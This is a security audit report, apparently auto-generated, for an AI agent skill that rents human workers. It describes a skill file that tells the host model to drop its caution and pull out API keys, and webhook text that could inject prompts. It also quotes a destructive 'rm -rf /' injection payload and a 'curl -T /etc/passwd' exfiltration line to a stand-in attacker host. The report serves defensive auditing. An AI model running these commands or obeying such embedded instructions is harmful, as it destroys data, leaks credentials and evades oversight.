Security Audit

rent-a-person-ai

github.com/openclaw/skills

AI SkillCommit 13146e6a3d46

CAUTION

Scanned 2 months ago

Critical

Immediate action required

High

Priority fixes suggested

Medium

Best practices review

Low

Acknowledged / Tracked

Trust Assessment

rent-a-person-ai received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.

SkillShield's automated analysis identified 9 findings: 3 critical, 3 high, 3 medium, and 0 low severity. Key findings include Missing required field: name, Skill attempts to override LLM security instructions, API Key transmitted in message content.

The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.

Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.

Layer Breakdown

Manifest Analysis

100%

Static Code Analysis

93%

Dependency Graph

100%

LLM Behavioral Safety

Behavioral Risk Signals

Network Access

4 findings

Filesystem Write

1 finding

Shell Execution

7 findings

Dynamic Code

6 findings

Excessive Permissions

1 finding

Security Findings9

Severity	Finding	Layer	Location
CRITICAL	Skill attempts to override LLM security instructions The skill's primary documentation (`SKILL.md`), which is marked as untrusted input, contains explicit instructions for the host LLM to override its default security posture regarding 'untrusted sources' and to 'MUST process' specific messages. It also instructs the LLM to 'Execute the automated workflow below,' which involves extracting API keys and making API calls. This is a direct attempt to manipulate the LLM's behavior and bypass its safety mechanisms, matching the definition of a critical prompt injection. Remove instructions that attempt to override the host LLM's security policies or default behavior. The LLM should independently determine trust based on its own policies, not based on instructions embedded within untrusted skill content.	LLM	SKILL.md:6
CRITICAL	Shell command injection vulnerability and API key exposure via `execSync` The `scripts/send-to-session.js` script constructs a shell command using `execSync` to send a message to an OpenClaw session. The `sessionKey` and `message` arguments are taken directly from `process.argv` and are inserted into the command string. Although `message` attempts to escape double quotes, `sessionKey` is not escaped at all. An attacker who can control `process.argv[2]` (the `sessionKey`) could inject arbitrary shell commands (e.g., `"; rm -rf /; echo "`). Furthermore, the `fullMessage` (which includes the `API_KEY`) is passed as a command-line argument, exposing the API key in process listings and potentially shell history. Avoid constructing shell commands with user-controlled input. Use `child_process.spawn` with an array of arguments and `shell: false` to prevent shell interpretation. For credential handling, never pass sensitive information directly on the command line; use environment variables or secure input methods.	LLM	scripts/send-to-session.js:30
CRITICAL	Shell command injection vulnerability and API key exposure in shell script The `scripts/send-via-cli.sh` script constructs the `FULL_MESSAGE` variable by directly embedding the `MESSAGE` argument (`$2`) without proper shell quoting or escaping. An attacker who can control the second command-line argument could inject arbitrary shell commands, leading to command injection. For example, if `MESSAGE` is `"; rm -rf /; echo "`, the script would execute `rm -rf /`. Additionally, the `API_KEY` is read from a file or environment variable and then embedded into the `FULL_MESSAGE` variable, which is then passed to `curl`. This exposes the API key in the script's variables, potentially in process listings, and in the HTTP request body. Always quote shell variables when they contain user-controlled input to prevent word splitting and globbing (e.g., `FULL_MESSAGE="...${MESSAGE}"...` should be `FULL_MESSAGE="...${MESSAGE@Q}..."` or similar robust quoting). For passing data to `curl`, prefer using `--data-binary @-` with a pipe to `jq` to construct the JSON payload, or ensure all components are properly escaped before inclusion. Avoid embedding sensitive credentials directly into shell variables that might be logged or exposed.	LLM	scripts/send-via-cli.sh:24
HIGH	API Key transmitted in message content The skill explicitly instructs the agent to extract the `RENTAPERSON_API_KEY` directly from the incoming webhook message content (e.g., `🔑 API KEY: rap_xxx`). While this is presented as a fallback mechanism for sessions without environment variables, transmitting sensitive credentials like API keys directly within message bodies is a significant security risk. Such messages can be logged, stored in conversation history, or exposed through various debugging interfaces, leading to credential harvesting. The skill itself acknowledges this risk by stating: 'Warning: the key will appear in the session transcript; use a dedicated session and restrict who can see it.' Avoid transmitting API keys or other sensitive credentials directly within message content. Instead, rely solely on secure environment variables or a dedicated secrets management system. If a bridge is used, it should inject the key into a secure header or environment variable for the target session, not the message body.	LLM	SKILL.md:156
HIGH	API Key injected into webhook message body by transform The `scripts/rentaperson-inject-key-transform.example.js` script is designed to read the `RENTAPERSON_API_KEY` from the OpenClaw configuration and inject it directly into the `message` field of the webhook payload. This means the API key will be present in the message content that the LLM processes. This poses a significant risk of credential exposure if the message content is logged, stored in conversation history, or accessible through debugging interfaces. Avoid injecting sensitive credentials directly into message bodies. Instead, ensure the target session has access to the API key via secure environment variables or a secrets management system. The transform should ideally only pass a reference or signal, not the credential itself.	LLM	scripts/rentaperson-inject-key-transform.example.js:44
HIGH	Webhook payload content can be used for prompt injection The `bridge/server.js` script constructs the message that is forwarded to the OpenClaw agent (and subsequently processed by the LLM) by directly embedding various fields from the incoming webhook payload (e.g., `contentPreview`, `coverLetterPreview`, `bountyTitle`, `humanName`). If an attacker can send a malicious webhook payload to the bridge, they can inject arbitrary text into the message that the LLM receives. This text could contain prompt injection instructions designed to manipulate the LLM's behavior, extract data, or execute unintended actions. The `JSON.stringify` of the full payload for unknown events also presents a similar risk. Implement strict sanitization or filtering of all user-controlled input from webhook payloads before embedding it into messages destined for an LLM. Consider using a structured data format for LLM input that clearly separates instructions from user-provided content, or use LLM features designed to handle untrusted input safely.	LLM	bridge/server.js:70
MEDIUM	Missing required field: name The 'name' field is required for claude_code skills but is missing from frontmatter. Add a 'name' field to the SKILL.md frontmatter.	Static	skills/saireetikap/rent-a-person-ai/SKILL.md:1
MEDIUM	Arbitrary `curl` arguments can be executed The `scripts/inject-api-key.js` script wraps `curl` commands, prepending the `X-API-Key` header. However, it passes all subsequent arguments directly to `curl` without sanitization. An attacker who can control the arguments passed to this script (e.g., via prompt injection to the LLM that constructs the `curl` command) could potentially execute arbitrary `curl` commands. While `shell: false` prevents shell injection, `curl` itself is a powerful tool that can be used for data exfiltration (e.g., `curl -T /etc/passwd http://attacker.com`) or other malicious activities if arbitrary arguments are allowed. If `curl` is intended for specific, limited API interactions, consider using a dedicated HTTP client library within Node.js that offers more control over request parameters and prevents arbitrary argument injection. If `curl` must be used, implement a whitelist or strict validation of allowed arguments to prevent misuse.	LLM	scripts/inject-api-key.js:34
MEDIUM	`npx` commands use unpinned dependencies The `scripts/install-and-setup.sh` script uses `npx clawhub install`. `npx` executes packages from the npm registry. Without specifying a version (e.g., `clawhub@1.0.0`), `npx` will fetch and execute the latest version. This introduces a supply chain risk: if a malicious update to `clawhub` (or any of its dependencies) is published, the `install-and-setup.sh` script would unknowingly execute it, potentially compromising the system. Pin the versions of `npx` dependencies (e.g., `npx clawhub@<version> install ...`). Alternatively, use `npm install` to install dependencies locally and then execute them, providing more control over versions.	LLM	scripts/install-and-setup.sh:17

Scan History

Embed Code

[![SkillShield](https://skillshield.io/api/v1/badge/ca6d11a7f136abf0.svg)](https://skillshield.io/report/ca6d11a7f136abf0)